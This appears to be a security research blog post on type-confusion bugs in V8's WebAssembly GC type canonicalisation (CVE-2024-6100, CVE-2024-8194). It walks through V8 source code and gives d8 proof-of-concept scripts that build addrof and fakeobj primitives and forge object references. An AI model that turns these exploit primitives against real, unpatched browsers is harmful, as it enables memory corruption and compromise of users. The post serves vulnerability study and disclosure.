Logo xia0o0o0o

Overview of WebAssembly Type Confusion in JavaScript Engines Exploitation

January 2, 2025
8 min read
Table of Contents

Overview of WebAssembly Type Confusion in JavaScript Engines Exploitation

Introduction

WebAssembly is a relatively low-level language and virtual machine, much closer to a real CPU than a higher-level language like JavaScript. Initially, WASM supports basic types:

TypeDescription
i3232-bit integer
i6464-bit integer
f3232-bit floating point
f6464-bit floating point

However, with WebAssembly Garbage Collection (WASMGC) extension, WebAssembly can now support more complex types.

In simplified terms, the idea of garbage collection is the attempt to reclaim memory which was allocated by the program, but that is no longer referenced.

WasmGC now adds struct and array heap types, which means support for non-linear memory allocation. Each WasmGC object has a fixed type and structure, which makes it easy for VMs to generate efficient code to access their fields without the risk of deoptimizations that dynamic languages like JavaScript have.

Reference Types

(type $s1 (struct)) ;; index = 0

Consider the type s1 the type (ref null $s1) is a reference type of s1 or null.

Struct Types

(type $s2 (struct (field i32) (field i64))) ;; index = 1

Array Types

(type $a1 (array i32)) ;; index = 2

Recursive Types

Recursive types of Wasm can define mutually recursive types.

(rec
  (type $A (struct (field $b (ref null $B))))
  (type $B (struct (field $a (ref null $A))))
)
(type $C (struct field $f i32) (field $c (ref null $C)))

External Types

External types can refer to types defined in host environments, for example, JavaScript.

Case Study

CVE-2024-2887

https://github.com/KpwnZ/browser-pwn-collection/tree/main/v8/CVE-2024-2887

CVE-2024-6100

Iso-recursive Types

The type constructor that solves recursive type equation can be represented as:

μα.τ\mu \alpha. \tau

And

μα.τ[μα.τ/α]τ\mu \alpha. \tau \equiv [\mu \alpha. \tau/\alpha]\tau

We call the left-to-right substitution unfolding, and the right-to-left is folding. The value of iso-recursive type must be introduced and aliminated using term-level operators. That is, we need type annotations to determine the type of the value when folding to ensure the uniqueness.

WasmGC supports type comparison between types from their recursive groups in different modules.

When it decodes type section

void DecodeTypeSection() {
  // ...
  for (uint32_t i = 0; ok() && i < types_count; ++i) {
    TRACE("DecodeType[%d] module+%d\n", i, static_cast<int>(pc_ - start_));
    uint8_t kind = read_u8<Decoder::FullValidationTag>(pc(), "type kind");
    size_t initial_size = module_->types.size();
    if (kind == kWasmRecursiveTypeGroupCode) {
      module_->is_wasm_gc = true;
      uint32_t rec_group_offset = pc_offset();
      consume_bytes(1, "rec. group definition", tracer_);
      if (tracer_) tracer_->NextLine();
      uint32_t group_size =
          consume_count("recursive group size", kV8MaxWasmTypes);
      if (tracer_) tracer_->RecGroupOffset(rec_group_offset, group_size);
      if (initial_size + group_size > kV8MaxWasmTypes) {
        errorf(pc(), "Type definition count exceeds maximum %zu",
               kV8MaxWasmTypes);
        return;
      }
      // We need to resize types before decoding the type definitions in this
      // group, so that the correct type size is visible to type definitions.
      module_->types.resize(initial_size + group_size);
      module_->isorecursive_canonical_type_ids.resize(initial_size +
                                                      group_size);
      for (uint32_t j = 0; j < group_size; j++) {
        if (tracer_) tracer_->TypeOffset(pc_offset());
        TypeDefinition type = consume_subtype_definition(initial_size + j);
        module_->types[initial_size + j] = type;
      }
      if (failed()) return;
      type_canon->AddRecursiveGroup(module_.get(), group_size);
    }
    // ...
  }
  // ...
}

In AddRecursiveGroup method

  uint32_t first_canonical_index =
      static_cast<uint32_t>(canonical_supertypes_.size());
  canonical_supertypes_.resize(first_canonical_index + size);
  // [!] take some time to consider what's wrong here
  for (uint32_t i = 0; i < size; i++) {
    CanonicalType& canonical_type = group.types[i];
    // Compute the canonical index of the supertype: If it is relative, we
    // need to add {first_canonical_index}.
    canonical_supertypes_[first_canonical_index + i] =
        canonical_type.is_relative_supertype
            ? canonical_type.type_def.supertype + first_canonical_index
            : canonical_type.type_def.supertype;
    module->isorecursive_canonical_type_ids[start_index + i] =
        first_canonical_index + i;
  }

which means for a type i, the canonical type index is module->isorecursive_canonical_type_ids[i] and canonical_supertypes_ maintains the relationship of subtyping. Recall the writeup of CVE-2024-2887, there is a maximum limitation for type index, which is kV8MaxWasmTypes = 1000000. But the code above does not check the boundary of canonical_supertypes_ and isorecursive_canonical_type_ids.

class ValueType {
 public:
  //...
  static constexpr int kLastUsedBit = 25;
  static constexpr int kKindBits = 5;
  static constexpr int kHeapTypeBits = 20;
  static const intptr_t kBitFieldOffset;
  // ...
}

Consider the definition of ValueType we only have 20bits for kHeapTypeBits and yes that’s enought for heap types but not for canonical type index since there is no boundary check for it. Thus we can have some type confusion strategies:

  • If we have a type i with a canonical type index (n << 20) + t it will be confused with type with canonical type index t.
  • We can create type confusion between internal reserved heap types and canonical type index.

In JSToWasmObject()

namespace wasm {
MaybeHandle<Object> JSToWasmObject(Isolate* isolate, Handle<Object> value,
                                   CanonicalValueType expected,
                                   const char** error_message) {
  // ...
  switch (expected.heap_representation_non_shared()) {
    case HeapType::kExtern: 
    // ...
  }
  // ...
}
}

And heap_representation_non_shared() will call heap_representation() which is defined as

  constexpr HeapType::Representation heap_representation() const {
    DCHECK(is_object_reference());
    return static_cast<HeapType::Representation>(
        HeapTypeField::decode(bit_field_));
  }

The heap type conversion simply take the bit field of the heap type. That means we can mess up the canonical type index and internal reserved heap type.

Proof of Concept

Here is the proof of concept:

/*
class TypeCanonicalizer {
 public:
  static constexpr CanonicalTypeIndex kPredefinedArrayI8Index{0};
  static constexpr CanonicalTypeIndex kPredefinedArrayI16Index{1};
  static constexpr uint32_t kNumberOfPredefinedTypes = 2;
}
*/
 
d8.file.execute('../..//test/mjsunit/wasm/wasm-module-builder.js');
 
 
const kV8MaxWasmTypes = 1000000;
 
// recursive group
// add kV8MaxWasmTypes types
let builder = new WasmModuleBuilder();
builder.startRecGroup();
for (let i = 0; i < kV8MaxWasmTypes; i++) {
    builder.addStruct([makeField(kWasmI32, true)]);
}
builder.endRecGroup();
let wasm = builder.instantiate();
 
builder = new WasmModuleBuilder();
 
builder.startRecGroup();
builder.addStruct([makeField(kWasmI32, true)]);
builder.addStruct([makeField(kWasmI32, true)]);
builder.addStruct([makeField(kWasmI32, true)]);
// kV8MaxWasmTypes + 5
let pwn_struct = builder.addStruct([
    makeField(kWasmI32, true),
    makeField(kWasmI32, true),
    makeField(kWasmI32, true),
    makeField(kWasmI32, true),
    makeField(kWasmI32, true),
    makeField(kWasmI32, true),
    makeField(kWasmI32, true),
    makeField(kWasmI32, true),
]);
let get_object = builder.addType(makeSig([wasmRefType(pwn_struct)], [kWasmI32]));
let set_object = builder.addType(makeSig([wasmRefType(pwn_struct), kWasmI32], []));
 
// LEB encode 
// https://webassembly.github.io/spec/core/binary/values.html
builder.addFunction('set_object', set_object).addBody([
    kExprLocalGet, 0,
    kExprLocalGet, 1,
    kGCPrefix, kExprStructSet, ...wasmSignedLeb(pwn_struct), 6,
    // struct.set struct_index, struct, field_index, value
]).exportFunc();
 
builder.addFunction('get_object', get_object).addBody([
    kExprLocalGet, 0,
    kGCPrefix, kExprStructGet, ...wasmSignedLeb(pwn_struct), 6,
]).exportFunc();
builder.endRecGroup();
 
const instance = builder.instantiate();
 
let arr1 = [1.1, 1.2, 1.3, 1.4];
let arr2 = [{}, 1.1, 1.2, 1.3];
 
function addrof(obj) {
    arr2[0] = obj;
    return instance.exports.get_object(arr2);
}
 
function fakeobj(addr) {
    instance.exports.set_object(arr2, addr);
    return arr2[0];
}
 
function hex(num) {
    return num.toString(16);
}
 
let addrof_arr1 = addrof(arr1);
let __arr1 = fakeobj(addrof_arr1);
 
console.log(hex(addrof_arr1));
console.log(__arr1);
%DebugPrint(arr1);

CVE-2024-8194

Google fixed CVE-2024-6100 by adding the following patch:

void TypeCanonicalizer::CheckMaxCanonicalIndex() const {
  if (canonical_supertypes_.size() > kMaxCanonicalTypes) {
    V8::FatalProcessOutOfMemory(nullptr, "too many canonicalized types");
  }
}

It will check the canonical type index when adding recursive group. But

static constexpr size_t kMaxCanonicalTypes = kSmiMaxValue;

kMaxCanonicalTypes is too big to fit in 20 bits. Thus we can still overflow the canonical type index to create a type confusion.

When it adds new recursive group

  for (uint32_t i = 0; i < size; i++) {
    group.types[i] = CanonicalizeTypeDef(module, module->types[start_index + i],
                                         start_index);
  }

Method CanonicalizeTypeDef will convert type index in structure to canonical type index.

    case TypeDefinition::kStruct: {
      const StructType* original_type = type.struct_type;
      StructType::Builder builder(&zone_, original_type->field_count());
      for (uint32_t i = 0; i < original_type->field_count(); i++) {
        builder.AddField(CanonicalizeValueType(module, original_type->field(i),
                                               recursive_group_start),
                         original_type->mutability(i),
                         original_type->field_offset(i));
      }
      builder.set_total_fields_size(original_type->total_fields_size());
      result = TypeDefinition(
          builder.Build(StructType::Builder::kUseProvidedOffsets),
          canonical_supertype, type.is_final, type.is_shared);
      break;
    }

In

ValueType TypeCanonicalizer::CanonicalizeValueType(
    const WasmModule* module, ValueType type,
    uint32_t recursive_group_start) const {
  if (!type.has_index()) return type;
  return type.ref_index() >= recursive_group_start
             ? ValueType::CanonicalWithRelativeIndex(
                   type.kind(), type.ref_index() - recursive_group_start)
             : ValueType::FromIndex(
                   type.kind(),
                   module->isorecursive_canonical_type_ids[type.ref_index()]);
}
 
  static constexpr ValueType CanonicalWithRelativeIndex(ValueKind kind,
                                                        uint32_t index) {
    return ValueType(KindField::encode(kind) | HeapTypeField::encode(index) |
                     CanonicalRelativeField::encode(true));
  }

When type.ref_index() >= recursive_group_start it will canonicalize with relative index.

We can control this relative index by

builder.addStruct([makeField(wasmRefType(n), true)]);

when n >= recursive_group_start. This makes us able to craft a type confusion between types with index 0x1000000 | n and n.

Proof of Concept

d8.file.execute('../..//test/mjsunit/wasm/wasm-module-builder.js');
 
const kV8MaxWasmTypes = 1000000;
 
// we can't fit all 0x100001 types in one recursive group
{
    console.log("[*] create 1000000 types");
    let builder = new WasmModuleBuilder();
    builder.startRecGroup();
    for (let i = 0; i < kV8MaxWasmTypes - 3; i++) {
        builder.addStruct([makeField(kWasmI32, true)]);
    }
    builder.endRecGroup();
    builder.instantiate();
}
{
    console.log("[*] create 0x100001 types");
    let builder = new WasmModuleBuilder();
    builder.startRecGroup();
    for (let i = 0; i < 0x100001 - 1000000; i++) {
        builder.addStruct([makeField(kWasmI32, true)]);
    }
    builder.endRecGroup();
    builder.instantiate();
}
 
builder = new WasmModuleBuilder();
let canonicalized_100001 = builder.addStruct([makeField(kWasmI32, true)]);   // canonical index 0x100001, index 0 in rec group
 
// group
builder.startRecGroup();
let ref2index2 = builder.addStruct([makeField(wasmRefType(2), true)]);       // heaptype index = 2 - 1 = 1, { field0(ref{externref}): 1(0x100001) }
let index2 = builder.addStruct([makeField(kWasmExternRef, true)]);           // index 2 in rec group
builder.endRecGroup();
 
// group
builder.startRecGroup();
let ref2canonicalized = builder.addStruct([makeField(wasmRefType(canonicalized_100001), true)]);   // heaptype 0x100001, { field0: rec0_type0x100001 }
let ext = builder.addStruct([makeField(kWasmExternRef, true)]);
builder.endRecGroup();
 
let fakeobj_type = builder.addType(makeSig([kWasmI32], [kWasmExternRef]));
 
builder.addFunction('fakeobj', fakeobj_type).addBody([
    kExprLocalGet, 0,                                       // get arg0
    kGCPrefix, kExprStructNew, canonicalized_100001,        // create struct with type 0x100001, { field0(int32): arg0 }
    kGCPrefix, kExprStructNew, ref2canonicalized,           // create struct with type 0 in group1, { field0(ref): { field0(int32): arg0 } }
    kGCPrefix, kExprStructGet, ref2index2, 0,               // type confusion, get { field0(int32): arg0 } as { field0(ref{externref}): arg0 }
    kGCPrefix, kExprStructGet, ext, 0,                      // get arg0 as externref
]).exportFunc();
 
let instance = builder.instantiate();
let fakeobj = instance.exports.fakeobj;
console.log(fakeobj(0xc0ffee | 1));
 
 

References

  • Seunghyun Lee (@0x10n): WebAssembly Is All You Need: Exploiting Chrome and the V8 Sandbox 10+ times with WASM
  • Yaoda Zhou, Bruno C. d. S. Oliveira, Jinxu Zhao: Revisiting Iso-Recursive Subtyping
  • ANDREAS ROSSBERG: Mutually Iso-recursive Subtyping (Expanded)